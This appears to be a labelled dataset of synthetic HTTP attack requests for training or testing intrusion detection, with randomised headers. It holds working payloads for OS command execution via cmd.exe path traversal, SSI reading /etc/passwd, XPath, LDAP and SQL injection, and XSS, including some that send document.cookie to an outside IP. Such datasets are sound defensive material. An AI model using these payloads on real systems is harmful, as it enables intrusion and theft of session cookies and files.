Max-Forwards: 346
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic MG5Bbm46cmh3bnk=
Authorization: hldat cieanw=potTrdl
Range: -162,92-
Referer: http://www.d3s0naet.de/uteF/awtrcgte/ol48Ooj/t6Noiidm/bopq5Or.ace
TE: gzip
Trailer: Max-Forwards
User-Agent: Mozilla/1.4 (X11; U; Linux i386 1.1; re-sl; rv:1.6.6) Gecko/06278261
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5386x6954
Via: FTP/7.1 111.194.175.184
Transfer-Encoding: los0o; ieowee=IoGna
Upgrade: cho/4.7, fss/8.0, m4ety/0.5, r4gd/1.6
Warning: 644 www.h7jist.js:4 "esfqduza4efrwceom" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 668643049393558
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47945
Start - Id: 36836
class: OsCommanding
POST /execp8@4x/teesswCmrsioect2/4t18-inhNscriptsLL/nv9i7PBqqT9Vm/ayttomwitlUry0tdma/UWscriptO8zdocument/eluiiascuooe30khnnp/JDul7SsICaccess_logusr7Vzw/hV_XPvwAyWEu/WdY.htaccesR2@BFcypx/qteeirsmmae/eiEeoEtPoV.jsp? HTTP/1.0
Content-Length: 92
Content-Language: ehSoaswc,tosdest
Content-Encoding: compress
Content-Type: application/x-www-form-urlencoded
Host: 235.76.132.57:80
Connection: keep-alive
Accept: image/*;q=0.7
Accept-Charset: euc-tw, x-mac-cyrillic;q=0.7, gb2312
Accept-Encoding: |   id   |
Date: Tue, 19 Sep 06 20:41:41 CET
If-Modified-Since: Tue, 26 Jun 07 01:53:48 UTC
If-Range: *
Pragma: no-cache
Referer: /kNoyldr/aSoem/recnenfA.jpg
User-Agent: an2CO4_ http://www.ooomon.com

euc=uniont=hm0~?tivMns&C7wY_servicesJqrg=uld7h&2GaP=v&rkAf4e3z9rl=caugt&aleeoAsso=7824

End - Id: 36836
Start - Id: 43996
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 29.234.73.63:80
Connection: close
Accept: text/html, audio/x-wav, audio/basic
Accept-Charset: big5;q=0.8, koi8;q=0.5, euc-jp, iso-8859-7
Accept-Encoding: 
Accept-Language: ntlrfIfe-y;q=0.1
Cache-Control: max-stale
Client-ip: 203.23.228.32
Cookie: lictMeO=ns 
Cookie2: $Version="691"
Date: Sat, 01 May 10 18:08:05 UTC
ETag: "WKKEhSDEdJpn_XZ.E"
Expect: inTns
From: 44fa@mshrPyo.gov
If-Modified-Since: Sat, 26 Aug 06 05:54:21 CET
If-Unmodified-Since: Sat, 21 Apr 07 02:06:37 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 04 Aug 08 09:11:38 CET
Max-Forwards: 1631
MIME-Version: 9.9
Pragma: 9=tyhewA
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: iozfa lptaoDn=iaErbu
Range: 7-,5039-10447,-749
Referer: http://b4MO.gov/epe8trwh/n7rr/itnT/eeeee/neKHo.txt
TE: trailers
Trailer: Referer
User-Agent: ehyec/7.2
UA-CPU: x86
UA-Disp: 402,257,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5667x180
Via: 4.1 www.wuoe.css
Transfer-Encoding: ikai; mnotso=9pei
Upgrade: hri4/0.3, heuue/7.3
Warning: 170 126.27.186.211 "do3kdsikezlS" "Fri, 29 May 09 15:50:00 UTC"
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 337660
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43996
Start - Id: 47130
class: XSS
GET /8Mx7J0Hsulx4ECn/l_w5M05ab/vwceixdsituiy4/2Ruae0cd4dA.dll?I-inURwhereo5I=385280&otbrsk=%3Cinput+++type++%3D++%22++image%22++++dynsrc%3D+%22javascript%3A++++%5Balert++%28%27srVihe%27%29%3B%5D++++%22++++%3E HTTP/1.0
Host: 83.231.142.118
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-cyrillic;q=0.3, isiri-3342;q=0.3, windows-1257, windows-1258
Accept-Encoding: gzip;q=0.0, compress;q=0.7, identity;q=0.3
Accept-Language: *
Cache-Control: max-age=8734
Client-ip: 136.159.131.62
Cookie: c4feIaxp4=utae~;lsao=tHxIj
Cookie2: $Version="12"
Date: Sat, 05 Jan 08 16:20:46 CET
ETag: "AAuuoYmaPm5p8GnR"
Expect: 100-continue
From: dy0mird@eelb.it
If-Modified-Since: Sat, 25 Jun 05 11:49:31 GMT
If-Unmodified-Since: Sun, 11 Mar 07 24:11:22 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 29 Apr 10 13:06:36 UTC
Max-Forwards: 11
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic b2hIdzRpYXM6U3FxYzdUMw==
Range: -63707,310050-133
Referer: http://xtui.gov/ive6He.mp3
TE: gzip
Trailer: TE
User-Agent: z4gftns/0.0
UA-CPU: 68000
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7372x166
Via: 0.4 84.133.35.89:86853, 7.7 www.ittsl4.js:3151, 1.1 84.161.175.210
Transfer-Encoding: yy0as
Upgrade: eixwry/2.2, nei/4.2, gHU/2.1
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 42655
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47130
Start - Id: 48400
class: XPathInjection
GET /._EWCXc/gmqTHDm/btemstorfs/BtYTrUj7Irmpasswd3LN/pgL.css?dnozvtth5snz=9FTUtvWuLV&m1yicoiiliatEa=947377079&mou2j=be&HaaMee=rteb&ienm2snl=Pfub2ya&cthnedclEleE=1294&rbedb8cd=tgdi%7Ee+i HTTP/1.0
Host: www.a2hvtewsSy.org
Connection: close
Accept: audio/x-wav;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.6
Accept-Language: *;q=0.8
Cache-Control: 0=mh
Client-ip: 60.234.178.167
Cookie: mUeyefatmf5ttg=30744893;vlk=p@1;sndx1=rJ2H;SVyrxgiKD=hetr'    or    (i   <   count(uag/child::text())     and   j    <   count(lntso/child::comment()) and    k     <  count(sdfo/child::*)  )  or    'ata'    =  '     m7esas'    or;acrN=oyza;la= a'sWes7qAstyleohnte/He
Cookie2: $Version="0"
Date: Thu, 30 Sep 04 21:52:13 GMT
ETag: W/"Gqax0ylWgLa_Q4qM"
Expect: 100-continue
From: geiEtz@rYpta.de
If-Modified-Since: Sun, 09 Aug 09 18:49:00 CET
If-Unmodified-Since: Fri, 31 Oct 08 14:17:40 UTC
If-Match: "b995iqoXu6EDEOKAo"
If-None-Match: "PxK2QpHmWFFDqRF"
If-Range: *
Max-Forwards: 1
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic c25yc3Npbjp0RWVlaA==
Authorization: NTLM NG9FeGhzdG9ob3RvZmgyYXJ2NW9oYWRleXNuc2JUaGVlU0FtdG14Z3I3
Range: 32-
Referer: /anttnHlE/entgTya/otnus3/rbhp/eneoe.jsp
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: zvW2X1 http://www.tearfaks.biz
UA-CPU: Sparc
UA-Disp: 574,086,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 141x150
Via: FTP/9.1 137.30.52.255, 7.3 233.98.40.170
Transfer-Encoding: compress
Upgrade: qilofs/3.4, hho/6.8
Warning: 446 www.itbfo.jpg "dseEaeE6A6ett29fsdp" 
X-Forwarded-For: 214.199.174.38
X-Serial-Number: 977334560600879
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48400
Start - Id: 44468
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 183.205.244.57
Connection: ooufaot
Accept: application/*, application/*;q=0.2, application/*
Accept-Charset: *
Accept-Encoding: identity;q=0.1, deflate;q=0.3
Accept-Language: iyi5p-srTaekr
Cache-Control: min-fresh=6358
Client-ip: 1.111.16.222
Cookie: sasni=0;2gCbr1niisf=cEGXIc4;dndDieyehnPey=fbssteNrxtermAiet;qr.passwdLFR=olecsAgsetraiy;rhst=386658
Cookie2: $Version="32"
Date: Tue, 15 Mar 05 24:19:04 CET
ETag: "9tG0dVXV9Y0RyLYk3AXZ"
Expect: jsde5on
From: bniw@mamjmaT.net
If-Modified-Since: Wed, 01 Dec 04 09:54:12 UTC
If-Unmodified-Since: Thu, 28 Oct 04 01:11:51 CET
If-Match: *
If-None-Match: "@0agL0twbZzBoki6N88p"
If-Range: Mon, 09 Nov 09 19:43:14 CET
Max-Forwards: 2
MIME-Version: 3.4
Pragma: eaeza=nineabru
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: Basic cjNydDpzeHZlYXdzcQ==
Range: 6-02287,72753-
Referer: /uutiNn/nmlmh29/eoeen/l56ax.zip
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: r3ue6/5.2
UA-CPU: Sparc
UA-Disp: 4598,6084,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: HTTP/7.0 229.21.102.43, o1lt8A/8.7 www.R9sre.jpg, 5.4 www.aviaki.js:75
Transfer-Encoding: gzip
Upgrade: arpaj/4.2, l8tsI/0.9, 9dev/6.0, m7u/6.0, sin/4.9
Warning: 501 www.cprtyoh.shtml "dxglmsBysiDotehi5yhe" 
X-Forwarded-For: 107.82.88.187
X-Serial-Number: 73463
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44468
Start - Id: 39554
class: SSI
PUT /K6i0FU1476XautoexecZ/6WQeDK/3sie1erumafwqopriat/Z0z3bgsoundZ6tJ-JQ0M8/srRBcA4tMGhO8Czg/Ntaohtees.html? HTTP/1.1
Content-Length: 140
Content-Language: abnt3rbi,enjkoco,ra5yIvrs
Content-Encoding: gzip
Content-Location: /udp5.mdb
Content-MD5: bjEyZWN1YW1paG5meXRpZA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 17 Aug 05 16:48:36 CET
Last-Modified: Fri, 08 May 09 02:21:37 GMT
Host: 138.149.80.173:8265
Connection: htd7
Accept: text/*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=6
Client-ip: 147.32.196.230
Cookie: diaiicCooboa=1HlT9P;ld=sN.;outr7rAa=9NstrLnn;ftt8ietaitOn=60;Ooos8=7Btmntreao;ec=CiEgerwithi
Cookie2: $Version="99"
Date: Mon, 07 Jan 08 07:36:52 GMT
ETag: "jH5nNBEG4Q3ydGqFcPDi"
Expect: 100-continue
From: resjr@ovdSf3ie7i.biz
If-Modified-Since: Sat, 30 Jul 05 21:35:58 UTC
If-Unmodified-Since: Sun, 10 Jul 05 16:59:49 GMT
If-Match: "YajuwwuhtHgbIv22"
If-None-Match: *
If-Range: "m3d43XpygTRLM7o.v"
Max-Forwards: 549
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: NTLM ZjJzNWlueDhhY29hdHBvZ2VvZWZwcmlyb2ljdDdidm55YXR5eTJpRWV4YWpTZXA=
Authorization: Basic ZWk4bmFmbnk6c3JybHRz
Referer: /Aesoa/nnbce/tnkna/airst.cgi
TE: trailers,gzip;q=0.3,deflate;q=0.5
Trailer: Accept-Encoding
User-Agent: Mozilla/0.8 (X11; U; SunOS sun4u 2.6; de-in; rv:2.1.3) Gecko/85502270
UA-Disp: 9090,6972,8
UA-OS: Windows 95
UA-Color: color32
Via: FTP/7.1 94.79.90.11:60453, 3.6 www.t3uTwn.png:87, HTTP/3.8 40.112.111.113
Transfer-Encoding: identity
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 138 www.mUgeeihd.jpeg "rr0mHnay7tiSwEpan" "Thu, 22 Mar 07 10:16:04 GMT"
X-Serial-Number: 11507528452920010282
----: --------------------
~~~~~: ~~~~~~~~~~~

Aco4z=don3ebiaeiqdh&q08dKTopenj=u9KWbRqE&hs1t=bsjm0hJr&almO5nkehi4He=<!--    #include virtual="/etc/passwd" -->&teqi=seftr

End - Id: 39554
Start - Id: 46976
class: XSS
GET /u0QBoNEBI_/ZUOhT7d/fh2jh8TrUa/n2m/3haLoev1n/u6d.ChIzGbVaEbzF3NUK/ueopiDht/E52/4dBJD3v6/fscriptVrJPGSB_shutdownp.cfm?ntmow=%3Cimg++++src%3D+%22+++++itnsatelin++++%3E+++++%22+++++onmouseover++%3D++++%22++%5Bwindow.open%28%27http%3A%2F%2F251.37.249.187%2Fge.mdb%27%2Bdocument.cookie%29%3B%5D%22++%3E&tsr44in=hao&2gstonbsTbeEeu=8hdmeo+benn&Fy7GiTzhwgety.i=26&he0fniery=+bRpshaoenai%7Es HTTP/1.0
Host: www.u7aery9i.cz
Connection: close
Accept: */*
Accept-Charset: big5, windows-1258, windows-1251
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.6
Cache-Control: max-age=1
Client-ip: 176.68.160.126
Cookie: kSagioulsfle=erKHtdvyI
Cookie2: $Version="8"
Date: Fri, 27 Feb 09 23:30:48 UTC
ETag: W/"1RB7F6M.D6iD7VDJ1x"
Expect: lirmAu=bfd2
From: wj0oee@a4ld5r2exe.uk
If-Modified-Since: Mon, 03 Dec 07 19:35:51 UTC
If-Unmodified-Since: Sun, 25 Nov 07 04:58:07 CET
If-Match: *
If-None-Match: "xuCeH@Vw4RVR34kI@Y8"
If-Range: Fri, 23 Jul 04 10:17:27 CET
Max-Forwards: 781
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM dERkdGN0N2RobWhKb2VoY2M1dXJ1ZWlpaXNXenVuYTZoMGM=
Authorization: NTLM cnRkc2xvb3dwZHJqNXJlb3RlczJvd3BvdGRzbm5ncHZhc1RhdWFm
Range: -299,87-,670-62
Referer: /tbel0a/Mosbe3O.conf
TE: deflate
User-Agent: Mozilla/4.4 (X11; U; Open BSD i386 5.9; pt-aH; rv:4.7.4) Gecko/20024068
UA-Disp: 2976,173,32
UA-Pixels: 199x2885
Via: FTP/6.1 10.144.201.252, ve38li/3.2 www.besdtn.tiff
Transfer-Encoding: compress
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 195 www.3bqBag.jpeg:1971 "ytfirbindsSon4she" 
X-Forwarded-For: 164.7.112.159
X-Serial-Number: 1856281598442747
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46976
Start - Id: 37542
class: LdapInjection
POST /teRoe8d6onrefi0f/u5i_TpE3_MRUseFRE/ulxrcyyr/tdowbeeq9atO5p.shtml? HTTP/1.0
Content-Length: 292
Content-Language: lo,sHazl2mu
Content-Encoding: compress
Content-Location: /saSubas/8t2byku/hpcm/Uarb.pdf
Content-MD5: RWxzaWRlQjRuaDNpb29lag==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Oct 07 19:40:03 CET
Last-Modified: Tue, 14 Mar 06 23:41:22 GMT
Host: 102.57.234.175
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: sda-mialvre;q=0.0, rde1-y;q=0.7
Cache-Control: max-age=2963
Client-ip: 75.168.219.135
Cookie: ectibsbnthc57eu=hNmacqet0nyEote;iblcnpafnc3n6r=riHoO
Cookie2: $Version="00"
Date: Mon, 18 Sep 06 08:02:37 CET
ETag: "IqZwGpXzggspWJiUdZ"
Expect: 3hainp=yeeT
From: nIt1h@rvrs.org
If-Modified-Since: Sun, 06 Apr 08 18:27:07 GMT
If-Unmodified-Since: Sun, 23 May 04 02:06:26 UTC
If-Match: *
If-None-Match: "FfXz0MQlWO0Py95pXt"
If-Range: *
Max-Forwards: 779
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM Y3I2M3NoN2VwZWZzcmtvaTN0cnVQOW5uZmU5Y3NHNHNxNWlndExOUQ==
Authorization: NTLM ZHR6aW5uYWViZW5hc0Nhc210NHJ4ZWxlcnJpb3Jub2dkcnV0dGky
Range: 0516-7855,069180-,334-
Referer: http://www.sz7a.org/atrWnits/dordxd/teoe.jsp
TE: gzip
Trailer: TE
User-Agent: Mozilla/1.9 (X11; U; Unix 3.3; ri-hx; rv:1.3.9) Gecko/32801746
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 523x786
Via: dqhx/9.3 www.3aosh.html, 9.7 www.afuRoia.png
Transfer-Encoding: deflate
Upgrade: uTzmh/1.6, onhq/1.4, ecsat6/1.2, etDno/7.8
Warning: 162 www.befnhlc.css "osea53nrTepho" 
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3fvapnsaGoa=body97s&3H3Oetsrtn9f0ei=575546&I0a=u8&UbeNetcqboot.iniW=geda &E2hjemu=Ik)(&(objectClass   =   er*)&eatws=nnfiwilua&lO=mngtechildT&an3iainien=80857&aNtt=ssDsnmfr&xSjt=cecFaisohe&s0m5ceeeen7paen=Rwh&uoivaadtatefu=364&e46h=c&c&1QtGBGtzO.=eesaeecrnoedepch&7tnvive6=43264

End - Id: 37542
Start - Id: 37032
class: LdapInjection
GET /o1a_BtlvFEd7vvvJ/sifeo97ia/VQncnmwc5N/Ie/oaLcQjc/yE8zIa11n49CeqxaLpH/ibhfDRzmw/12osWik9sNnonnnbztim/IoyesoLvyr.mdb?r9onx9tsiudeeaK=%29+++%28++%7C+++%28displayName%3Dhad*%29%28name+++%3Dhad*%29%28+++mail%3Dhad*+%29&atTituismanzsiI=%26hm%40%258&bos=x7wrahrsn%2Fe&Ir7fdmna=child&eVcM8Ezhyn=96&hcgsslpldOl2=100349 HTTP/1.0
Host: 27.145.114.245
Connection: close
Accept: */*
Accept-Charset: iso-8859-2, iso-8859-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: yRq='lt'
Client-ip: 142.195.161.161
Cookie: s5eghbd1=i;lmte=eN st0Ni[r?nNv;mnOhx.I4=88679
Cookie2: $Version="95"
Date: Fri, 28 Jan 05 07:53:04 CET
ETag: ".SThcMpKfONI8Cjdcf"
Expect: kodtt
From: B3nrc@Ecode1.gov
If-Modified-Since: Sat, 16 Dec 06 18:54:11 GMT
If-Unmodified-Since: Mon, 26 Feb 07 07:31:34 GMT
If-Match: "3dTQFi5lg15QF-a1M"
If-None-Match: *
If-Range: "iy2.9BK1JPsvN9p"
Max-Forwards: 0173
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: 7leiRa otmjthT=taes
Range: 13730-521,976-,-1177
Referer: http://www.4wtym3hi.gov/jE4tnda/md8ke/petu/eltt/Onsfr.cfm
TE: trailers
Trailer: Connection
User-Agent: hraiif5z8 (tdO6j9tm8; eOtjZPnkb; eUOr8Cm.a; eLMF_yV)
UA-CPU: MIPS
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: HTTP/7.1 www.itoyhei.shtml
Transfer-Encoding: h4e2Oh; zotoikeu=rAgrxl
Upgrade: seta/1.0, wmndNp/4.4
Warning: 561 255.42.223.99:0 "naeetom" "Sat, 31 Jul 04 14:02:35 GMT"
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37032
Start - Id: 37615
class: LdapInjection
POST /smdcr/oK0pVoe.bin? HTTP/1.1
Content-Length: 114
Content-Language: tad,auf
Content-Encoding: deflate
Content-Location: http://www.aerN0d.uk/nyel7/tsravu/praeh1/o5i5/ymih1d.txt
Content-MD5: b3I3ZXVtZWF0YnM0bHRlbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 May 05 02:25:46 GMT
Last-Modified: Wed, 16 Jul 08 22:54:10 UTC
Host: www.aesnesfne.st
Connection: keep-alive
Accept: image/*, text/xml;q=0.9, image/gif
Accept-Charset: x-mac-korean, iso-2022-kr, x-mac-arabic;q=0.3, iso-8859-8, iso-8859-3
Accept-Encoding: gzip, gzip, deflate;q=0.0, deflate, compress
Accept-Language: cc-giun, s-hEatx;q=0.7, rEsta-eaOane;q=0.7, Nabesri-iyE3kRs0;q=0.9
Cache-Control: max-age=69107
Client-ip: 34.23.57.157
Cookie: nCtfOoEaLifee=741;lp=2
Cookie2: $Version="61"
Date: Sat, 17 Jul 04 01:32:22 UTC
ETag: "6t0u8o_yH@NZvJitW"
Expect: 100-continue
From: tiwatv@kDh9.de
If-Modified-Since: Wed, 18 Aug 04 15:21:39 GMT
If-Unmodified-Since: Tue, 18 Aug 09 01:50:14 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 08 Apr 10 19:37:53 UTC
Max-Forwards: 92
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest username="pitaah"
Authorization: 9zero hxpb=aiseetc
Range: 9-3321,97916-131
Referer: /oidse/zsuSeP9/e1a0e/saul/so1Igo9o.js
TE: trailers
Trailer: Accept-Language
User-Agent: s8lw6PbbdW http://www.glegimie.st
UA-CPU: PowerPC
UA-Disp: 2548,1743,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 770x317
Via: 0.9 68.127.98.228, pSlge/6.8 www.makIEa.css, 3.9 www.nsaieape.png:1603
Transfer-Encoding: deflate
Upgrade: KhGnr/5.3, xofo/5.0, aRe/6.6
Warning: 019 53.184.51.92 "gqnaoerdito" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fwultdxowOho=0Na2&oeBeti=em9rr&pFJN8Enph-2xpr=um)( |(riex=*)&41CwZ42W=euen9 ~Ipuo&aehtjoprobu=ky4fog

End - Id: 37615
Start - Id: 46604
class: XSS
GET /rH/9HIb4ti4wrQ/oo1L0v4@7.asp?jef4b=09V-0&syejeyV=eNi0qev3C&oc=d+t&eqhmUnprEpefraH=04210&txtloora=dsblo HTTP/1.0
Host: 114.222.85.54
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-age=3602
Client-ip: 115.60.4.78
Cookie: lXPlibT=bodytewntaLi%n iie;6Knaccess_log=txre;gl9rsS0=wlnwhere7;dgOeetAntdyt=eMfTPXe2g
Cookie2: $Version="8"
Date: Sun, 21 Mar 10 14:39:35 UTC
ETag: W/"i1SzQL9_A_G6IGY"
Expect: 100-continue
From: Jthbz@Aett6xa.be
If-Modified-Since: Wed, 19 Nov 08 22:58:06 CET
If-Unmodified-Since: Sat, 05 Feb 05 04:47:29 GMT
If-Match: "4NTRaxJvIj7vpshte7uB"
If-None-Match: *
If-Range: *
Max-Forwards: 65
MIME-Version: 0.9
Pragma: sdeenei=mzc
Authorization: Digest qop=auth-int
Range: 29-,197659-,4-7273
Referer: /mhsyjc/a94e1f/am2aesar/mrsoait.rar
TE: deflate;q=0.6
User-Agent: <object   classid = "clsid:..."    codebase ="   javascript: [alert  ('enetioimff');]  "   >
UA-CPU: x86
Via: HTTP/2.7 175.0.56.161, edlh/8.8 www.ifKXh.jpg:98522, 4.2 81.82.128.233
Transfer-Encoding: deflate
Upgrade: 1ssnt/2.7, Necil/0.4
X-Serial-Number: 1492216071266742097

null

End - Id: 46604
Start - Id: 49794
class: XPathInjection
GET /kDQQIxVbgAcItu/w8ZbiqPU4F9-Y/pokrb48tX3/iHp.mdb?e8ieunw=akozXYHkSw%40J&bmhhjno=Ap&lsvysee=hKmIeFZ3j5L4&lwp9bttnin8eoqi=3598477&4esb7efi4z1ht=ti5o3di&cnil6cyya=+mau&tLeegU=Qw&rxafgnfityu=3703&leetrSdaPtcnith=dwe7n%27++++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or++%27eww%27++%3D++%27&tBmy=m%7Cijssz6t&uAAiur=3&xsaxlreDkinctd=silrmQhS8apasswdhn%27&koeselnscEo=meta HTTP/1.0
Host: 78.92.184.233
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: sp-Uxeyy8li, Na-meebcrhq;q=0.1
Cache-Control: eRmbn=ghtisnl
Client-ip: 189.86.236.48
Cookie: certth=o;igonkkeBaImtodr=n@Esadig0tpoN+t;rf4ey=709;astryTtlfmru=Al ee ir;llcyneA=nst
Cookie2: $Version="493"
Date: Tue, 22 Jul 08 17:29:15 CET
ETag: W/"8Nw-K59c314vRFuXk"
Expect: o7eBsmo9
From: soenml@saae0wd.org
If-Modified-Since: Mon, 31 Jul 06 01:45:15 CET
If-Unmodified-Since: Tue, 16 Jan 07 03:39:54 UTC
If-Match: "INpItTVHZ3I-SkGHxveB"
If-None-Match: "XQEPajdmxpZtqu1yBy"
If-Range: Mon, 04 Jun 07 18:06:18 GMT
Max-Forwards: 584
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: rSty h1Ur7n=AeSu
Range: 1-,586-,-3399
Referer: http://www.diavspX.fr/do3he/hy8emo/aa9lo/eeui.msf
TE: trailers
Trailer: Connection
User-Agent: fFhrmc4e (iNFIDF; il3Xa_CO; nee_c1Mix6; cie-lyFa)
UA-CPU: x86
UA-Disp: 662,518,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 742x2872
Via: blani/4.6 229.12.67.27, FTP/6.6 www.Ng5s2.shtml, 9.5 250.149.189.69
Transfer-Encoding: deflate
Upgrade: afn/1.9, wee/7.0
Warning: 972 67.57.148.71 "btc9redfdijsq0" 
X-Forwarded-For: 203.64.166.11
X-Serial-Number: 09611302404410791541
----: ----------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49794
Start - Id: 42719
class: SqlInjection
PUT /quHEcWlbw@5FRE5YJYGB/Repr/cI.UVp2ewJUs9zvFFvOg/xsgad.php? HTTP/1.0
Content-Length: 17
Content-Language: N,a
Content-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 28 Oct 08 02:55:35 CET
Host: www.wmn1ihnj.com
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: '  )  UNION    ALL    SELECT   is7ngei    FROM 1dfhtr WHERE   (    ''='
Accept-Language: do-f, it-nlpee;q=0.8, 8ritAaeR-gn;q=0.2, wi28oe-ht8i;q=0.0
Cache-Control: max-stale=565
Cookie2: $Version="1"
Expect: 100-continue
If-Unmodified-Since: Sat, 14 Nov 09 08:18:46 GMT
If-Match: *
Max-Forwards: 533
MIME-Version: 7.5
Referer: /nathE/yct443ni.php3
TE: trailers,gzip
User-Agent: Mozilla/8.7 (Machintosh; U; PPC Mac OS X 8.3; sh-tk; rv:6.4.5) Gecko/93804827

qRhoretcauel=aC6n

End - Id: 42719
Start - Id: 47274
class: XSS
GET /Lsamshutdownvw/0XcfS/eh2RTS3CB5FNk/cKZVT/atnsLcJkIbtMa.E5ytk/evsut/swRaAZsMcVqZ@ohgkVP/aasdfneows/dmaycri/ouctLAat8/461sAaxsT/9Tcso6RfR.Kr.shtml?etoig=51&rli=nF6nt8+&in=%3C%21%5BCDATA%5B%3C%21--%5D%5D++++%3E%3Cscript+%3E%5Bwindow.open%28%27http%3A%2F%2F16.82.166.193%2Fla.cfm%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript+++%3E&E6a44=scjyaM+%25t&yNsuYakb=nxml8%2F0der HTTP/1.0
Host: www.eDtqdgynhE.biz
Connection: dedeNl
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.1, deflate;q=0.9, deflate
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 48.5.47.91
Cookie: hjesnneac6=965106;is=7669071717;ihitD2zeaoyf7ea=uln?;sr=uShe2ttHNseso;5HfeoiEmdumpn1e=84
Cookie2: $Version="51"
Date: Thu, 15 Apr 04 01:30:26 GMT
ETag: W/"Ufd2bZimO@p87fbplQ"
Expect: eplnt
From: eA3ce@Sdytnl.st
If-Modified-Since: Sat, 28 May 05 13:29:17 CET
If-Unmodified-Since: Thu, 27 Mar 08 04:46:03 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 05 Mar 08 15:09:09 UTC
Max-Forwards: 9663
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic YWp3VGFoekU6aW1ycUI=
Range: 3-25949,-0524
Referer: http://www.scEe.biz/88tiuu/sohos/e02Mi/b2jnSxh7/ee2oOrT.jsp
TE: trailers,deflate;q=0.7,chunked;q=0.0
Trailer: Trailer
User-Agent: NhgafdE
UA-CPU: x86
UA-Disp: 3073,5344,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 753x7661
Via: 9.5 216.91.65.162
Transfer-Encoding: deflate
Upgrade: do2f/2.6
Warning: 544 64.237.95.167 "lcneysNrh9o" 
X-Forwarded-For: 228.59.131.84
X-Serial-Number: 15152704800
----: ----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47274
Start - Id: 49548
class: XPathInjection
